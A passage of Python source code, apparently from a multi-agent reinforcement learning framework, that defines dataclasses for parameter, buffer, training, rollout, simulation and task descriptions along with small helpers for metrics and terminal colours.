identify=kwargs.get("identify", None),
id=kwargs["id"],
lock=kwargs.get("lock", True),
env_id=kwargs.get("env_id", "test"),
type=kwargs.get("type", cls.Type.PARAMETER),
data=kwargs.get("data", None),
description=kwargs.get(
"description",
{
"registered_name": "test",
"observation_space": None,
"action_space": None,
"model_config": {},
"custom_config": {},
},
),
)
@dataclass
class MetaParameterDescription:
meta_pid: PolicyID
parameter_desc_dict: Dict[PolicyID, ParameterDescription]
timestamp: float = time.time()
identify: str = "MetaParameterDescription" # meta policy id
def __post_init__(self):
self.identify = f"{self.identify}_mpid_{self.meta_pid}_{self.timestamp}"
@classmethod
def gen_template(cls, **kwargs):
return cls(
meta_pid=kwargs["meta_pid"],
parameter_desc_dict={
k: ParameterDescription.gen_template(id=k) for k in kwargs["pids"]
},
)
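# Illustrative only: MetaParameterDescription.gen_template(meta_pid="MP0",
# pids=["policy_0"]) builds one placeholder ParameterDescription per policy id
# and an identify string of the form
# "MetaParameterDescription_mpid_MP0_<timestamp>".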
@dataclass
class BufferDescription:
env_id: str
agent_id: Union[AgentID, List[AgentID]]
policy_id: Union[PolicyID, List[PolicyID]]
batch_size: int = 0
sample_mode: str = ""
indices: List[int] = None
data: Any = None
data_shapes: Dict[str, Tuple] = None
sample_start_size: int = 0
capacity: int = 1000
identify: str = None
def __post_init__(self):
if self.identify is None:
self.identify = "_".join(sorted(self.agent_id))
def __str__(self):
return "<BufferDescription: agent_id={} policy_id={}".format(
self.agent_id, self.policy_id
)
@dataclass
class AgentInvolveInfo:
"""`AgentInvolveInfo` describes the trainable pairs, populations, environment id and the
meta parameter descriptions.
"""
training_handler: str
trainable_pairs: Dict[AgentID, Tuple[PolicyID, PolicyConfig]]
""" describe the environment agent id and their binding policy configuration """
populations: Dict[AgentID, Sequence[Tuple[PolicyID, PolicyConfig]]]
""" describe the policy population of agents """
env_id: str = None
""" environment id """
meta_parameter_desc_dict: Dict[AgentID, MetaParameterDescription] = None
""" meta parameter description """
@classmethod
def gen_template(
cls,
agent_ids: List[AgentID],
observation_space: gym.Space,
action_space: gym.Space,
):
example_ptup = (
"policy_0",
{
"registered_name": "test",
"observation_space": observation_space,
"action_space": action_space,
"mode_config": None,
"custom_config": None,
},
)
return cls(
training_handler="test",
trainable_pairs=dict.fromkeys(agent_ids, example_ptup),
populations=dict.fromkeys(agent_ids, [example_ptup]),
env_id="test",
meta_parameter_desc_dict=dict.fromkeys(
agent_ids,
MetaParameterDescription.gen_template(meta_pid=None, pids=["policy_0"]),
),
)
@dataclass
class TrainingDescription:
agent_involve_info: AgentInvolveInfo
stopper: str = "none"
stopper_config: Dict[str, Any] = field(default_factory=dict)
policy_distribution: Dict[AgentID, Dict[PolicyID, float]] = None
update_interval: int = 1
batch_size: int = 64
mode: str = "step"
time_stamp: float = time.time()
@classmethod
def gen_template(cls, **template_attr_kwargs):
raise NotImplementedError
@dataclass
class RolloutDescription:
agent_involve_info: AgentInvolveInfo
fragment_length: int
num_episodes: int
episode_seg: int
terminate_mode: str
mode: str # on_policy or off_policy or imitation learning ?
# parameter_desc_seq: Sequence[MetaParameterDescription] = None
callback: Union[str, Callable] = "sequential"
stopper: str = "none"
stopper_config: Dict[str, Any] = field(default_factory=dict)
policy_distribution: Dict[AgentID, Dict[PolicyID, float]] = None
time_stamp: float = time.time()
@classmethod
def gen_template(cls, **template_attr_kwargs):
agent_involve_info_kwargs = template_attr_kwargs.pop("agent_involve_info")
instance = cls(
agent_involve_info=AgentInvolveInfo.gen_template(
**agent_involve_info_kwargs
),
policy_distribution=dict.fromkeys(
agent_involve_info_kwargs["agent_ids"], {"policy_0": 1.0}
),
**template_attr_kwargs,
)
template_attr_kwargs["agent_involve_info"] = agent_involve_info_kwargs
return instance
@dataclass
class SimulationDescription:
agent_involve_info: AgentInvolveInfo
policy_combinations: List[Dict[AgentID, Tuple[PolicyID, PolicyConfig]]]
num_episodes: int
callback: Union[str, Callable] = "sequential"
max_episode_length: int = None
time_stamp: float = time.time()
@classmethod
def gen_template(cls, **kwargs):
agent_involve_template_attrs = kwargs.pop("agent_involve_info")
instance = cls(
agent_involve_info=AgentInvolveInfo.gen_template(
**agent_involve_template_attrs
),
**kwargs,
)
kwargs["agent_involve_info"] = agent_involve_template_attrs
return instance
@dataclass
class TrainingFeedback:
agent_involve_info: AgentInvolveInfo
statistics: Dict[AgentID, Any]
@dataclass
class RolloutFeedback:
"""RolloutFeedback for rollout tasks"""
worker_idx: str
"""id of rollout worker"""
agent_involve_info: AgentInvolveInfo
"""agent involve info describes the ..."""
statistics: Dict[str, Any]
policy_combination: Dict[PolicyID, PolicyID] = None
def __post_init__(self):
pass
# for res in self.statistics.values():
# for k, v in res.items():
# if isinstance(v, MetricEntry):
# res[k] = v.value
@deprecated
@dataclass
class EvaluationFeedback:
# env_id: str
agent_involve_info: AgentInvolveInfo
statistics: Dict[PolicyID, Dict[str, Any]]
policy_combination: Dict[PolicyID, Tuple[PolicyID, PolicyConfig]]
@dataclass
class TaskDescription:
"""TaskDescription is a general description of
Training, Rollout and Simulation tasks.
"""
task_type: TaskType
"""task type used to identify which task description will be used"""
content: Union[TrainingDescription, RolloutDescription, SimulationDescription]
"""content is a detailed task description entity"""
state_id: Any
timestamp: float = None
source_task_id: str = None
identify: str = None
def __post_init__(self):
timestamp = time.time()
self.timestamp = timestamp
if self.task_type == TaskType.OPTIMIZE:
prefix = "TrainingDescription"
elif self.task_type == TaskType.ROLLOUT:
prefix = "RolloutDescription"
elif self.task_type == TaskType.SIMULATION:
prefix = "SimulationDescription"
else:
prefix = "UnknowDescription"
self.identify = f"{prefix}_{timestamp}"
@classmethod
def gen_template(cls, **template_attr_kwargs):
task_type = template_attr_kwargs["task_type"]
if task_type == TaskType.OPTIMIZE:
desc_cls = TrainingDescription
elif task_type == TaskType.ROLLOUT:
desc_cls = RolloutDescription
elif task_type == TaskType.SIMULATION:
desc_cls = SimulationDescription
else:
raise ValueError("Unknow task type: {}".format(task_type))
content_template_attr_kwargs = template_attr_kwargs.pop("content")
instance = cls(
content=desc_cls.gen_template(**content_template_attr_kwargs),
**template_attr_kwargs,
)
template_attr_kwargs["content"] = content_template_attr_kwargs
return instance
@dataclass
class TaskRequest:
"""TaskRequest is a description of"""
task_type: TaskType
"""defines the requested task type"""
content: Any
"""content is the feedback of current handler which request for next task"""
state_id: str
timestamp: float = None # time.time()
identify: str = None
computing_mode: str = "bulk_sync" # bulk_sync, async
def __post_init__(self):
assert self.state_id, "State id cannot be None"
timestamp = time.time()
self.timestamp = timestamp
self.identify = f"TaskRequest_{timestamp}"
@staticmethod
def from_task_desc(task_desc: TaskDescription, **kwargs) -> "TaskRequest":
return TaskRequest(
task_type=kwargs.get("task_type", task_desc.task_type),
content=kwargs.get("content", task_desc.content),
state_id=kwargs.get("state_id", task_desc.state_id),
timestamp=kwargs.get("timestamp", None),
identify=kwargs.get("identify", None),
)
class BColors:
HEADER = "\033[95m"
OKBLUE = "\033[94m"
OKCYAN = "\033[96m"
OKGREEN = "\033[92m"
WARNING = "\033[93m"
FAIL = "\033[91m"
ENDC = "\033[0m"
BOLD = "\033[1m"
UNDERLINE = "\033[4m"
class EvaluateResult:
CONVERGED = "converged"
AVE_REWARD = "average_reward"
REACHED_MAX_ITERATION = "reached_max_iteration"
@staticmethod
def default_result():
return {
EvaluateResult.CONVERGED: False,
EvaluateResult.AVE_REWARD: -float("inf"),
EvaluateResult.REACHED_MAX_ITERATION: False,
}
class TrainingMetric:
LOSS = "loss"
@dataclass
class BatchMetaInfo:
episode_id: str
created_time: float
meta_policy_id: str = None
policy_id: str = None
env_id: Any = None
policy_type: Any = None
class ExperimentManagerTableName:
primary: str = ""
secondary: str = ""
tag: str = ""
key: int = 0
nid: int = 0
class EventReportStatus:
START = "start"
END = "end"
# TODO(jing): add docs for MetricEntry
class MetricEntry:
def __init__(self, value: Any, agg: str = "mean", tag: str = "", log: bool = True):
self.value = value
self.agg = agg
self.tag = tag
self.log = log
def cleaned_data(self):
"""Return values"""
|
StarcoderdataPython
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.